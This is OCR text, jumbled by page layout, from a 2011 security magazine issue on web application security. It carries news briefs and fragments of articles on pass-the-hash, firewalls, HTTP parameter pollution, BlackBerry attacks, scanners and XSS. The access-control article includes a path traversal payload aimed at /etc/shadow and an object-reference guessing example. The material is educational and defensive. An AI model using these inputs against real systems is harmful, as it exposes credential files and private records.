You are on page 1of 27

07/2011

07/2011 (43)
44
team
Editor in Chief: Ewa Dudzic
ewa.dudzic@hakin9.org
Managing Editor: Patrycja Przybylowicz
patrycja.przybylowicz@hakin9.org
Editorial Advisory Board: Donald Iverson, Michael Munt,
Jonathan Edwards, Elliott Bujan, Carlos Alberto Ayala
DTP: Ireneusz Pogroszewski
Art Director: Ireneusz Pogroszewski
ireneusz.pogroszewski@software.com.pl
Marketing Manager: Magorzata Bocian
m.bocian@hakin9.org
Proofreaders: Donald Iverson, Michael Munt, Elliott Bujan, Bob
Folden, Steve Hodge
Top Betatesters: Ivan Burke, Aby Rao, John Webb, Braqndon
Dixon, Michal Stawieraj, John DeGennaro, Flemming Laugaard,
Robert Arrison, Francisco Gomez Rodriguez
Special Thanks to the Beta testers and Proofreaders who helped
us with this issue. Without their assistance there would not be a
Hakin9 magazine.
Senior Consultant/Publisher: Pawe Marciniak
CEO: Ewa Dudzic
ewa.dudzic@software.com.pl
Production Director: Andrzej Kuca
andrzej.kuca@hakin9.org
Publisher: Software Press Sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.hakin9.org/en
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.
All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
To create graphs and diagrams we used program
by
The editors use automatic system
Mathematical formulas created by Design Science MathType
DISCLAIMER!
The techniques described in our articles may only
be used in private, local networks. The editors
hold no responsibility for misuse of the presented
techniques or consequent data loss.
Dear Readers,
The leading topic of this issue is Web Application Security. We have
picked this topic, because of the popularity of various web apps,
which are an integral part of the daily life not only of the IT experts, but
also common non-IT people. Hackers have a range of opportunities
to perform attacks in this area. Even a quick search in the Internet
provides a long list of vulnerabilities of popular web applications.
These vulnerabilities are used to gain the illegal access to web or
database servers. The results are unpredictable from a leakage of
data to devastation. Software and web app developers concentrate
their efforts on features and functionality. The security issues are
very often neglected because of various reasons, like time schedule
for the project, or lack of knowledge the knowledge that securing
application is an important part of a developers job.
I recommend you to read An overview of Web Application Security
Issues written by Julian Evans. Its a great introduction and summary Issues Issues
in one to this wide topic. A joint article HTTP Parameter Pollution
Vulnerabilities in Web Applications is worth your attention for sure. Its a Vulnerabilities in Web Applications Vulnerabilities in Web Applications
result of cooperation of three specialists from this field: Marco Balduzzi,
Luca Carettoni and Stefano Di Paola. Inside, you will find two practical
texts about web testing: Web Testing Using Active and Passive Scanners
by Ric Messier and Web Applications: Testing and Securing Your Code
by Joe Pezzino and Phil Rusek. In the defense section there is an article
which links the current issue to the previous one Web Applications:
Access Control and Authorization Issues written by Nilesh Kumar. In the Access Control and Authorization Issues Access Control and Authorization Issues
columns you can read the continuation of Matt Jonkman article about
Command and Control Channels, and a great, amusing story by Ali Al-
Shemery Mummies still walk among us! Read it, have fun and find out Mummies still walk among us! Mummies still walk among us!
why attacking new systems with old techniques still works.
Starting with August issue we are introducing two new columns.
Some of you might know the names, but I would like it to be a surprise
for the rest of the readers.
Now, I would like to announce the contest for Hakin9 readers. The
prize is a Syngress book Web Application Obfuscation. I encourage
you to take part. The details of the contest you will find below.
CONTEST
As you all may notice, we have recently changed the formula of the
magazine and we are no more a free magazine generating its income
from advertisers. We would like to offer our readers as much as we
can for the subscription price. That is why we decided to announce the
contest on the best ideas how to improve the magazine and the website
content to make it more attractive for the readers. Send us the list of your
ideas with short descriptions for each of them. Just think what would you
like to read about in Hakin9 magazine and what would you like to get for
the subscription fee. Write it down and send it to us. 3 best letters will be
awarded with the hard copy of Web Application Obfuscation.
The list of your ideas should be delivered till 21th of July on the following
address: en@software.com.pl with the message titled: CONTEST 7/11. en@software.com.pl en@software.com.pl
The contest results will be published in the August issue.
Enjoy reading!
Patrycja Przybyowicz
& Hakin9 team
PRACTICAL PROTECTION IT SECURITY MAGAZINE

6 07/2011
CONTENTS
IN BRIEF
08 Latest News From the IT Security
World
By Armando Romeo, eLearnSecurity and ID Theft
Protect
STORIES
10 Mummies still walk among us!
By Ali Al-Shemery
Imagine all the great sources of information on the
Internet today such as: news groups, blogs, websites and
forums, and you still see networks, and websites being
hacked and torn down using old hacking techniques. For
God sake, isnt that a walking mummy? The author in
amusing way describes why it is so important to keep the
knowledge updated and why attacking new system with
old techniques still works. Read the true, didactic and full
of sense of humor story.
BASICS
14 Firestarter: Starter to your Firewall
By Mervyn Heng
The firewall is the first line of defense on the network
perimeter and end points. Firewalls are the gatekeepers to
facilitate the flow of necessary traffic to and from assets.
The author in his article focuses on the best practices
when setting up a host-based firewall on a Ubuntu 10.4
LTS laptop. He describes how the host-based firewalls
allow all traffic by default to offer users with immediate
access to networks and the Internet and how network-
based firewalls interestingly employ the opposite tactic
as their default rule is to deny all.
ATTACK
18 HTTP Parameter Pollution
Vulnerabilities in Web Applications
By Marco Balduzzi, Luca Carettoni, Stefano Di Paola
Is your web application protected against HTTP Parameter
Pollution? A new class of injection vulnerabilities allows
attackers to compromise the logic of the application
to perform client and server-side attacks. HPP can be
detected and avoided. But how? This article discusses
why and how applications may be vulnerable to HTTP
Parameter Pollution. By analyzing different attacking
scenarios, The authors of this article introduce the
HPP problem. They describe PAPAS, the system for
the detection of HPP flaws, and conclude by giving the
different countermeasures that conscious web designers
may adopt to deal with this novel class of injection
vulnerabilities.
26 Does your BlackBerry Smartphone
have ears?
By Yury Chemerkin
The smartphone becomes the most popular gadget all
over the world. Undoubtedly, compactness, convenience
and PCs functional capabilities have been winning
modern users hearts. People may think that Internet
surfing is safer with their favorite smartphone than by
PCs and that the privacy loss risk is minimized, however
analytical statistics show the opposite. From this article
we will find out why every BlackBerry is vulnerable to
multiple network attacks and how it is that address book
provides a spam-attack vector. The author explains
also how deceptions may mislead Blackberry users
to compromise security and what makes the DMTF
signalling a possible covert channel.
DEFENSE
42 Web Testing Using Active and Passive
Scanners
By Ric Messier
Website creation has become so simple that just anyone
can do it. This doesnt mean that everyone can do it well.
There are so many frameworks and tools available to
make dynamic sites easy to put up quickly. The author
of this article shows how to scan systems using both
an active and a passive Web proxy. He also explains the
differences between active and passive scanning and
points out the reasons why doing regular site scanning
cant be overvalued.
46 Web Applications: Access Control and
Authorization Issues
By Nilesh Kumar
This article is about different kinds of Access Control
mechanisms and issues with them in Web Applications.
Where sufficient authorization checks are lacking,
access controls may be abused by the logged-in user.
The impact can be catastrophic. Improper access control
handling may result in information leakage or worse
unauthorized access to system components. The article
helps to imagine what will happen if a normal user is
able to access the contents meant only for a system
administrator. The author describes a few scenarios of
where authorization checks are not performed correctly
and shows what their impact could be.
www.hakin9.org/en 7
CONTENTS
52 Web Applications: Testing and Securing Your Code
By Joe Pezzino, Phil Rusek
With the high demand for applications and information, companies have
made data readily and easily available. Web applications, to keep in touch
with friends, download music, or order a new espresso machine, are used
so commonly you seldom think about how the information is presented
to you. From this article you will find out how to test and secure your web
applications. The authors will share with also you their knowledge why the
best practice against SQL Injection is to write a code that stores procedures
and prepared statements.
ID EXPERTS SAYS...
56 An overview of Web Application Security Issues
By Julian Evans
Web application security is very much in its infancy some security
experts believe this is going to be a major emerging area of technology.
Nowadays web apps are more complex and are based on a client-server
architecture. This architecture is evolving and we see web apps such as
Google Apps acting as a word processor, storing the files and allowing
you to download the file onto your PC. Facebook and the social web have
also moved into Web apps hence the recent coined phrase Web 3.0. This is
the overview article in which author points out the most current issues in
area of Web App security, such as: programming development, JavaScript
API, AJAX programming, mobile security or Facebook app security and
authentification.
EMERGING THREATS
60 Why are there So Many Command and Control
Channels Part Two
By Matt Jonkman
In his last article Matt Jonkman wrote about Command and Control
Channels, or CnCs. In this one he continues the topic of CnC channels and
take up the discussion of the individual categories. He also describes some
up to date examples of many of these cathegories out of the Emerging
Threats Sandnet.
CARTOONS
62 The Asylum
By Jim Gilbert
Jims cartoons are non-figurative. The reason ot this lies in his long
search, how to combine words and graphics. As a result he started to
draw cartoons. Specifically he is excited about The Asylum because of
its minimal nature, minimal drawing, minimal words, minimal characters...
maximum content.
07/2011
8
In brief
www.hakin9.org/en
9
In brief
Google powers new security tool: DOM
snitch
Google, in the past few years, has shown a good interest
in secure coding related projects with its Gruyere,
Skipfish and now the just released DOM Snitch.
The tool, powered by Google Zurich, is aimed at
helping developers uncover potential weak points in
their Javascript code. It is supposed to help with client
side vulnerable code that might lead to DOM based XSS
and other issues that might cause alteration of how the
same origin policy is supposed to work.
The tool, still in its alpha release, comes as a Chrome
extension and promotes testing in place of debugging,
giving the developers the correct tool and a simple
interface from which to spot weak points before bad
hackers do.
Source: Armando Romeo,
www.elearnsecurity.com
BSides, a continuing success
BSides are community powered conferences where the
intimate and friendly environment makes it easy and
enjoyable to stay with other fellow security enthusiasts,
share ideas and learn something new.
The idea was born two years ago with the goal of
giving space to talks that didnt find it in major hacking
conferences. With time these community events are
becoming the preferred choice for everyone willing to
take part to the community without having to spend
thousands dollars for an entrance ticket. Attendance is
indeed FREE.
June has offered two exceptional opportunities to
European security enthusiasts: BSidesLondon and
BSidesVienna. With the participation of high profile
speakers the two events went sold out really fast and
have proved, if necessary, that this is going to be the
way conversation is going to happen in the security
community.
Source: Armando Romeo,
www.elearnsecurity.com
European businesses preparing for
tougher data breach rules
As a reaction to Sony and Sega latest breaches, the
European Union is going to approve laws that will force
business in the Union to immediately inform customers
of any serious data breach.
The proposal is an important change for the Security
and privacy landscape in Europe where companies,
until now, could deal with data breaches internally
without bearing the costs of branding damages and
incident response handlings.
The law, if approved in Autumn, might raise the cost
per breached record in the Union. Since TJX breach,
businesses have learnt how most of the costs of each
data breach lies in the customer support to be given
once the breach is announced. With increased cost
per record, business are expected to factor in a higher
expense in security controls that should, at least in
theory, prevent breaches from happening at all.
The new bill, proposed by European commissioner
Viviane Reding, is a big step in the right direction.
Although laws without proper enforcement are just
useless. Time will tell if this will turn into additional
security for final consumers.
Source: Armando Romeo,
www.elearnsecurity.com
Citibank wasnt hacked. It was ridiculed
We are all maybe tired of hearing stories and news
about how this or that big corporation has been
hacked, breached, exposed et cetera. However theres
something in the Citibank data breach, that by the way
exposed over 200,000 customer information, that is
worth reporting.
While we are still used to trivial and decade old
vulnerabilities being exploited in large corporations, this
time hackers (but really it could have been a 7 years old
kid), managed to harvest information in the most simple
and straightforward way: changing customer ID in the
location bar of their web browser.
Even the most obvious reflected XSS becomes elite
hacking in front of such a huge failure. However whats
to note is that the most obvious XSS can be detected by
tools. This kind of logic flaw might not. Time for a serious
application security related discussion at Citibank. Are
they going to hire some QA (because theres really no
need for a pentester here)?
Source: Armando Romeo,
www.elearnsecurity.com
Lulzsec hacking crew says bon voyage
Lulzsec is the hacking crew that has hacked into major
companies worldwide including Infraguard, CIA, Nato,
US Senate, AOL, AT&T, Disney, Sony, Hackforums.net
and many other.
Only 50 days after the first attack the crew has now
announced to disband and quit activities not before
giving the community the results of their last attack:
A number of internal sensitive documents stolen
from AOL and AT&T, the whole database of the famous
hacking forums Hackforums.net and and many other
customer data from various sources.
The announcement was given on Twitter where the
crew collected a quarter million followers in few weeks.
07/2011 10
STORIES
Mummies still walk among us!
U
sing a basic SQL Injection to knock out a
reputed companys website is a walking
mummy. Using an old ftp server with a remote
buffer overflow exploit spread in the wild a long time ago
is a walking mummy. Using a php application with basic
security features either turned off, or not implemented
is a walking mummy. Using a misconfigured web
application server in a production environment is a
walking mummy. Even easily bypassing a companys
firewall using old techniques is a walking mummy.
Well, as you can see, if we want to write a list of these
mummies that walk among us, actually well find there
are countless specimens!
Companies and their IT staff that get hacked by
such old techniques or, as I called them, mummies ,all mummies mummies
have in common either lack of knowledge, or outdated
information!
Wake up, your brain needs an update!
Yes my dear, if you want to compete, or at least not to
wake up at a train station where the train has left you
behind on the bench, you must update yourself! The
ICT world is moving as fast as a train, and sometimes I
even feel it faster. So, walking aside it will just make you
look as if youre the turtle racing with a cheetah!
Enabling automatic updates for your systems to get
the latest software or buying and deploying the latest
network technology tools doesnt mean that your safe,
nor does it mean that you have everything working
correctly! Some systems might fail to function in the
way it was intended to, if you update to the newest
latest version. Example on that is an ASP.net web
application that uses framework 2, and after an update
to framework 3 it stopped functioning correctly. This is
true if the IT personnel has no knowledge about how a
proper patch management is done, or how to update
critical systems without breaking them!
Besides all that, buying the latest network security
devices or tools and not knowing how or where to place
them, will lead to useless or near to zero benefit! This
is also true if there is lack of knowledge in how the
network or these tools operate.
You dont have to be an expert in all fields to get a
better secure system and network, but its not bad to
have a different flower from the same garden! This is
much better than getting your system, network or, like
we see these days, reputed websites getting knocked
out with an old and basic hacking technique!
Huh!, what was all this intro. about?
A couple of months ago a friend of mine called me to help
him convince and prove to his institute that his personal
email account was stolen because of a breach or misuse
of their network. He needed a person from outside the
institute to prove that their system administrators dont
know about the water that has gone beneath their toes!
Before I went over there, I asked my friend about their
environment, just general stuff, such as what and how
Mummies Still Walk
Among Us!
Imagine all the great sources of information on the Internet today
such as: news groups, blogs, websites and forums, and you still see
networks, and websites being hacked and torn down using old
hacking techniques. For God sake, isnt that a walking mummy?
What you will learn
Why you need to keep your knowledge updated,
Why attacking new systems using old techniques still work,
How to perform the Pass-The-Hash attack.
What you should know
System Administration basics,
Familiar with security tools such as: Metasploit, Psexec,
gsecdump, msvctl, etc.
www.hakin9.org/en
Have you ever run a vulnerability scanner, such as
Nessus, NeXpose, etc? If not, I highly encourage
you do. You shall see how each vulnerability or
misconfiguration is reported about, and you will find
very useful information on the proper way to patch
or solve them. The guys who have created and are
updating these tools have done a really huge great
help to the IT personnel.
To defend your network from such an attack, there
are some points you need to put into consideration:
Isolate Sensitive systems. As we saw that when
we gained access to one system we were able
to reach critical and sensitive systems.
Enforce Least User Access (LUA). Giving Enforce Least User Access Enforce Least User Access
each user administration privileges on his/her
machine can lead to big problems as we saw in
our case. The minimum and least privileges you
give your users the most control you have over
the network, and will help you mitigate lots of
threats not just Pass-THE-HASH.
Limit Cached Credentials. If the system didnt
cache the password hash of the domain
administrator, we might have not been able to
succeed with our attack like this.
There are lots of other techniques and ways
to secure your system from PASS-THE-HASH
such as Dual Authentication, Using IDS/HIDS,
or Smart Cards, etc.
Summary
When Neo in the Matrix was to face the Agents, he
needed new tools and weapons, and thats where
his mate Tank stepped in as a source of information
which provided him with what he needed; exactly like
the Kung-Fu techniques we all saw (wish I could have
some of those)! The ICT world is just like that Matrix,
its evolving rapidly, and you need to cope with that.
The Internet is a great source of information for all the
people over the world to use and update themselves.
So please wake up, and update yourself, because
attacking new systems with old techniques is really a
shame!
ALI ALSHEMERY
The author has been working as a network security of cer for
diferent large companies for more than ve years. His day
to day activity is related to rewall auditing, IDS/IPS, and
policy enforcement. He holds a Ph.D. degree and MS.c. degree
in Computer Information Systems (CIS), and a BS.c. degree
in Computer Science. Throughout his working career he
managed to gain a couple of well known technical certicates
such as: ECSA, CEH, CNI, CLP10, CLA10, CLDA, IBM Certied
Specialist System p Administration, Novell Linux Specialist,
and RHCE.
07/2011 14
BASICS
Firestarter: Starter to your Firewall
www.hakin9.org/en 15
F
irewalls are the gatekeepers to facilitate the flow of
necessary traffic to and from assets.
Background
Why deploy firewalls if they do not prevent targeted
attacks? The firewall is a mature technology that when
deployed correctly is accomplished in protecting systems
against reconnaissance (eg. port scans) and worm
propagation by hiding vulnerable services. A classic
example was the havoc created by the Slammer worm
in January 2003. The worm was devastating despite its
diminutive payload of 376 bytes. Administrators were
not aware of the risk they put their SQL Servers at by
exposing port 1434 to the Internet until it was too late.
Home users were also infected as they unknowingly
had MSDE residing on their systems.
Besides supplying ingress control, firewalls also
offer egress control. In the event that a system was
compromised by a Trojan or backdoor, the Access
Control List (ACL) will prevent the effectiveness of the
malware if the port used by it is not sanctioned by the
firewall.
This article focuses on best practices when setting
up a host-based firewall on a Ubuntu 10.4 LTS laptop
but the principles discussed are relevant to securely
protecting other Operating Systems (OSs) and networks
as well. Host-based firewalls allow all traffic by default to
offer users with immediate access to networks and the
Firestarter: Starter to
your Firewall
The firewall is the first line of defense on the network perimeter
and end points. Firewalls are susceptible to targeted attacks (eg.
social engineering, application vulnerabilities) but they are still the
foundation upon which access control is built upon.
What you will learn
Introduction to access control
Conguring a host-based rewall on Ubuntu
Troubleshooting Firestarter
What you should know
Network, system and application fundamentals
Familiarity with Ubuntu
Figure 1. Firestarter Figure 2. Interface
07/2011 16
BASICS
www.hakin9.org/en
Pidgin successfully connected to the MSN network
and this was verified by the Active connections in the
main console.
An alternative to viewing logs on the firewall would be
checking the settings in Pidgin. It is revealed that port
1863 is used to connect to messenger.hotmail.com.
Error messages offer an obvious answer to what the
issue is. An attempt to send an encrypted email in Gmail
using S/MIME set off an error message. The message
highlights that an attempt was made to connect to
the server on port 465. Adding a firewall rule to allow
outbound connections over port 465 resolved this
issue.
Conclusion
There has been debate regarding the relevance of
firewalls in this day and age with the evolving threats
that exists. Firewalls not infallible but they remain
a critical element to infrastructure security as they
continue to be one of multiple components that must
be in place for defense in depth. This tried and tested
technology is effective in controlling access when:
1. It is the first security measure implemented in your
networks and on your systems.
2. The principle of least privilege is applied and only
necessary ports/protocols/services are permitted.
3. Access is limited to specific IP(s) where applicable.
4. Logging is vital because it assists in troubleshooting
and investigations.
5. It is deployed in synergy with other mechanisms
(eg. VPN, 2FA) that secure access.
Host-based firewalls are bundled with OSs but it is
shocking that they are neglected by organisations and
individuals for access control.
MERVYN HENG
Mervyn Heng, CISSP, loves Information Security and
Open Source. These interests are translated into his life in
Singapore where he practises the 2 philosophies and attempts
to transfer these passions to his friends through awareness.
If you have any comments or queries, please contact him at
commandrine@gmail.com.
07/2011 18
ATTACK
HTTP Parameter Pollution
I
n the last twenty years, web applications have grown
from simple, static pages to complex, full-fledged
dynamic applications. Web applications can accept
and process hundreds of different HTTP parameters to
be able to provide users with rich, interactive services. As
a result, dynamic web applications may contain a wide
range of input validation vulnerabilities such as Cross-
Site Scripting (XSS) and SQL injection (SQLi). According Site Scripting Site Scripting
to the OWASP Testing Guide v3, The most common web
application security weakness is the failure to properly
validate input coming from the client or environment
before using it. This weakness leads to almost all of the
major vulnerabilities in web applications [...]. Several kind
of injection flaws exist and they are usually strictly related
to the specific metalanguage used by the subsystems:
XML Injection, SQL Injection, LDAP Injection, etc. Each
application layer uses a specific set of technologies and a
characteristic contextual language.
In 2009, Luca Carettoni and Stefano di Paola
introduced a new class of web vulnerabilities called
HTTP Parameter Pollution (HPP) that permits to inject
new parameters inside an existing HTTP parameter.
Lately, in 2010, Marco Balduzzi of the International
Secure Systems Lab at EURECOM investigated the
problem and developed a system, called PAPAS, to
detect HPP flaws in an automated way. He used PAPAS
to conduct a large-scale study on popular websites and
discovered that many real web applications are affected
by HPP flaws at different levels.
This article discusses why and how applications
may be vulnerable to HTTP Parameter Pollution. By
analyzing different attacking scenarios, we introduce
the HPP problem. We then describe PAPAS, the
system for the detection of HPP flaws, and we conclude
by giving the different countermeasures that conscious
web designers may adopt to deal with this novel class
of injection vulnerabilities.
Parameter Precedence
In the context of websites, when the users browser
wants to transfer information to the web application
(e.g. a server-side script), the transmission can be
performed in three different ways. The HTTP protocol
allows to provide input inside the URI query string
(GET parameters), in the HTTP headers (e.g. within
the Cookie field), or inside the request body (POST
parameters). The adopted technique depends on the
application and on the type and amount of data that has
to be transferred.
This standard mechanism for passing parameters is
straightforward, however, the way in which the query
string is processed to extract the single values depends
on the application, the technology, and the development
language that is used.
The problem arises when a developer expects to receive
a single parameter and, therefore, invokes methods (such
as Request.getParameter in JSP) that only return a single
value. In this case, if more than one parameter with the
HTTP Parameter
Pollution Vulnerabilities
Is your web application protected against HTTP Parameter
Pollution? A new class of injection vulnerabilities allows attackers
to compromise the logic of the application to perform client and
server-side attacks. HPP can be detected and avoided. But how?
What you will learn
what is HTTP Parameter Pollution (HPP)
how to spoil HPP aws in web applications
how to prevent HPP in web developing
What you should know
basic understanding of web technologies and languages
web security knowledge is a plus
in Web Applications
07/2011 26
ATTACK
Does your BlackBerry smartphone have ears?
www.hakin9.org/en 27
T
he smartphone becomes the most popular
gadget all over the world. Undoubtedly,
compactness, convenience and PCs functional
capabilities have been winning modern users hearts.
People may think that Internet surfing is safer with their
favorite smartphone than by PCs and that the privacy
loss risk is minimized, however analytical statistics
show the opposite.
The most popular doesnt mean most protected. Users
who have purchased their devices tend to forget about it
because they enjoy a passwords protection. Is iPhone
or Android protected? Nope. BlackBerry users have a
superior method of protection: password and encrypted
file system based on ECC algorithms. Is that really the
case? In my second article in February 2011 Issue Is
Data Secure on the Password Protected Blackberry
Device?, I detailed how to steal the password from a
device, and in further articles Im going to improve this
method.
Statistics show that more than 90% of fashionable
gadgets owners (like iPhone) store the personal
information (photos, mail or contacts) without any device
Does your BlackBerry
smartphone have ears?
This saying may come from a story about Dionysius of Syracuse
(430-367 BC), who had an ear-shaped cave cut that connected the
rooms of his palace so that he could hear what was being said from
another room. Similar listening posts were installed in other palaces
over the centuries, including the Louvre in Paris.
What you will learn
Every BlackBerry is vulnerable to multiple network attacks
Address book provides a spam-attack vector
Every BlackBerry Voice Notes Recorder can endanger security
DMTF signalling is possible covert channel
Deceptions may mislead Blackberry users to compromise
security
What you should know
Basic knowledge about BlackBerry security
Figure 1. Encryption Feature Figure 2. Up-to-date BlackBerry Contact

Join the National Information Security Group (NAISG)
FREE ANNUAL MEMBERSHIP FOR HAKIN9.org SUBSCRIBERS

FACT SHEET
Overview
The National Information Security Group (NAISG) is a non-profit organization that promotes
awareness and education of information security through the support of local and regional
chapters. Members include IT administrators, managers, law enforcement personnel, the
media, educators and students and anyone else interested in getting or staying on the cutting
edge of information security.
NAISG:
OPEN YOUR OWN CHAPTER ANYWHERE IN THE GLOBE.
MONTHLY MEETINGS AT EACH CHAPTER - VISIT ONE WHEN YOU CAN - FREE.
SECURITY VENDOR NEUTRAL - NO PRODUCT PRESENTATIONS.
MEMBERS ARE IT SECURITY PROFESSIONALS, LAW ENFORCEMENT, STUDENTS, EDUCATORS AND OTHERS.
EDUCATIONAL VENUE ON NEW SECURITY TECHNIQUES AND OTHER INFORMATION SECURITY ISSUES.
FREE DAILY TECHTIPS - EMAIL AND ONLINE FORUM FOR FREE SUBSCRIPTION TO SOLVE ANY SECURITY OR
IT RELATED QUESTION OR PROBLEM YOU ARE HAVING.
No formal security experience required. Come to learn, share tips and tricks and network with IT professionals!

Leadership
Bradley J. Dinerman, founder and president - Brad is the founder and president of Fieldbrook Solutions LLC, an IT
and MIS and consulting firm in Massachusetts. He is a CISSP and a Microsoft MVP in Enterprise Security, holds a
number of technical certifications, is an active member of the FBI Infragard and the Microsoft IT Advisory Council and
earned a Ph.D. in physics from Boston College. Brad frequently contributes to online TechTips sites and gives user
group and conference presentations around the country. More information is available at
http://www.naisg.org/About/.
Board of Directors A six-member board of directors provides direction for the group. Members of the board
represent various segments of the IT/security community, including academia, law enforcement, defense and the
legal sectors. Bios of the board members may be found at http://www.naisg.org/Board/.
National Advisory Council This council includes the leaders of each chapter and provides inter-chapter support.
U.S. Chapters
As of April, 2011, NAISG maintains the following chapters in addition to its online presence, for a total of more than 5,000
members:
Atlanta, GA; Boston, MA; Dallas, TX; Houston, TX; Midland, MI; Orlando, FL; Seattle, WA; Little Rock, AR
Key Sponsors
Astaro - http://www.astaro.com

NetClarity - http://www.netclarity.net
SECURANOIA - ANNUAL SECURITY CONFERENCE
- TO BE HELD THIS FALL IN BOSTON, MA, USA

NAISG is the legal trademark of the National Information Security Group, Inc. All Rights Reserved.

NAISG is a NON-PROFIT ORGANIZATION.
07/2011 42
DEFENCE
Web Testing Using Active and Passive Scanners
www.hakin9.org/en 43
I
n addition, anyone can quickly put up a LAMP server
to provide database storage to go with those dynamic
sites. There are a lot of pitfalls to creating sites in
a way that doesnt easily give up data unnecessarily.
Testing your sites and applications will protect you and
your customers or users but performing that testing takes
skill, diligence and patience without appropriate tools.
There are a number of tools available for the job
and commercial varieties will cost you in the tens of
thousands or more, depending on the size and scale of
your testing endeavors. Fortunately, there are cheaper
ways to accomplish the same task with more than
reasonable results.
Active or Passive?
Active scanning is more common, using a number of
familiar tools. WebScarab, BurpSuite and Paros are all
common tools used to do vulnerability checking for Web
applications. Active scanning will run attacks against the
server in a very methodical and complete way. It is very
noisy and can be very disruptive to operations if you are
running it against a production system which is often
necessary not everyone has the resources to operate
and maintain an exact mirror of their production system as
a development environment. There is an option, though,
which is less noisy and more difficult to notice that you
are running scans against the system in question. There
are legitimate reasons for scanning systems you dont
have control over. With Web attacks becoming so much
more prevalent again, it may just be protecting yourself to
know whether a site may be vulnerable to attack so you
can make an informed decision about whether to share
your information with them.
In those cases, you dont want to run a full-blown spider
and active scan against those sites. It would be obvious
to the site and network administrators what was going on
and while your reasons are honorable and not malicious
in any way, they wont be perceived that way. Its possible
that they would pursue you for your efforts and while that
pursuit may not be legally successful, it would be more of
a pain than you want to handle. In that case, you may want
to take a passive approach and use a tool that analyzes
the site based on normal interactions with it. This would be
less comprehensive, of course, because the passive tool
wont do a full spider of the site so the analysis would be
limited to the pages that you visited. However, that may be
acceptable for the purposes you have.
Active scanning tools generally have a graphical user
interface which may be preferable. The passive scanning
tool we will be looking at, and the only one I am aware of
at the time of this writing, is a command line tool which
has some value in some circumstances. Both, though,
act as proxies. Requests originating from the browser
get sent through these tools, just like any network
proxy. The tool then stores the information and acts on
it as necessary before sending it along. That may mean
simply recording the request and response as well as the
URL or it may mean doing something like intercepting
Web Testing Using Active
and Passive Scanners
Web site creation has become so simple that just about anyone can
do it. This doesnt mean that everyone can do it well. There are so
many frameworks and tools available to make dynamic sites easy to
put up quickly.
What you will learn
How to scan systems using both an active and a passive Web
proxy
The value of doing regular site scanning
The diferences between active and passive scanning
What you should know
How to use a Web browser
How to congure proxy settings in your Web browser

07/2011 46
DEFENCE
A
ccess Control, as the name suggests, is the
mechanism of determining privileges of different
users to access the contents of an application.
It can also manage fine-grained read and write
permissions on the files owned by a particular user.
In other words, access control decides who has the
authorization to use files, manipulate their contents, or
visit a website. In the case of web applications, access
control mechanisms allow different users different levels
of access to web pages and functions
Access Control or Authorization is different from
Authentication. Many people tend to get confused with
them. Authentication comes first which just checks
whether you are a valid user of the system or not; once
successfully authenticated to the application, then the
authorizations determine which resources a user has
permission to access (Figure 1).
Where sufficient authorization checks are lacking,
access controls may be abused by the logged-in user.
The impact can be catastrophic. Imagine, what will
happen if a normal user is able to access the contents
meant only for a system administrator.
Issues with Improper Access Control
Implementations
Improper access control handling may result in
information leakage or worse unauthorized access to
system components. Let us see a few scenarios of
where authorization checks are not performed correctly
and what their impact could be:
1. Path Traversal: Path traversal normally happens
due to improper permission checking prior to
downloading a file. Instead of getting a file, a
user attempts to obtain other files for which he
or she lacks permission. Such attacks can occur
if an application employs relative paths (../../../
Web Applications:
This article is about different kind of Access Control mechanisms and
issues with them in Web Applications.
What you will learn
What access controls are and their behavior if not
implemented correctly.
What you should know
Basic Web related concepts
Access Control and Authorization Issues
Figure 1. Access control mechanism

Figure 2. Path traversal attack


Web Applications: Access Control and Authorization Issues
If the application is not properly validating the inputs
to see whether the current user is allowed to see it,
then information leakage and improper disclosure
of private information will occur. http://MyBank.com/
profiles?profile_ID=87654321.
3. Forced Browsing: In this case a user has gone
through certain steps to access the final URL. But
sometimes, the user is able to bypass these checks
and is able to directly access the URL. In the worst
cases, the URL can be accessed without any kind
of authentication. For example, in order to get a
discount code in a shopping web site you need
to go through various checks like validating your
../targetfle) to provide information to users. The
user can abuse this by supplying e.g, ../../../../
../../etc/shadow to access the file which contains
hashed login information. The following figure
(Figure 2) shows how an application allows a user
to download files.
If absolute file path is replaced with ../../../../etc/
shadow, it will download the shadow file from the system
(Figure 3) which can be cracked (Figure 4) to get the
valid login credentials to finally connect to the server
and compromise it! (Figure 5)
2. Insecure Direct Object Reference: Authorities
such as Open Web Application Security Project
(OWASP) categorize it as a separate category,
but this is also a type of improper access control
check. In this type of implementation, applications
use some kind of references to display the
corresponding files or pages to the users. These
references may be their identifier tokens.
For example, suppose a banking application shows a
profile to authenticated user on basis of the account
number.
http://MyBank.com/profiles?profile_ID=12345678.
The user makes an educated guess that one may be
able to view the profiles of other users by supplying
any valid account number (for example 87654321).
Figure 3. The Shadow le being downloaded
Subscribe to our newsletter and stay up to date with
all news from Hakin9 magazine!
http://hakin9.org/newsletter
a d v e r t i s e m e n t
07/2011 52
DEFENCE
Web Applications: Testing and Securing Your Code
www.hakin9.org/en 53
W
e as a society give these same web
applications personal and financial infor-
mation, not really thinking how our information
is being protected, or how easy it is for unauthorized
retrieval.
Web application security claims to be a priority for
many businesses, yet it never fails to read or hear
about data leakage from web application vulnerabilities.
Barracuda Networks was a victim to an attack on an
application used to communicate with product users.
This gave attackers access to over a dozen databases
leaking employee and business partner information.
Gawker Media ran into the same issue in the end of
2010 with nine of their websites compromised including
sites like Gizmodo and Lifehacker. This attack exposed
over 1 million email addresses and passwords of
registered users and were then used to spam Twitter
accounts with the same login credentials as Gawker
accounts. The numerous attacks on Sonys servers
made a technology giant fall to its knees with loss of
services and a drop in the market. Although at the time
of this writing, it has not been disclosed how Sonys
PlayStation network was breached, several of their
online stores were attacked and taken down due to
SQL Injection.
An attack on a network is not only embarrassing,
but can lead to loss of profits, lengthy downtime, or
significant fines. Securing your web applications isnt
a difficult task if its designed properly the first time and
routinely audited. This article covers the top threats
for web applications, and how you can protect against
them.
Cross-Site Scripting
Businesses are gaining edge over their competitors by
having dynamic content that increases user interaction
with their pages. This dynamic content changes to
fit the needs and preferences of a particular user,
operating system and browser settings and behavior.
This generation of dynamic content is where the
security risk arises from, as static content has a much
smaller attack surface. The most primitive attack on this
dynamic content is called Cross-Site Scripting, dubbed
XSS for short.
The point of an XSS attack is to alter the content
of the intended page to the needs of the attacker via
injection of arbitrary code (usually JavaScript) into a
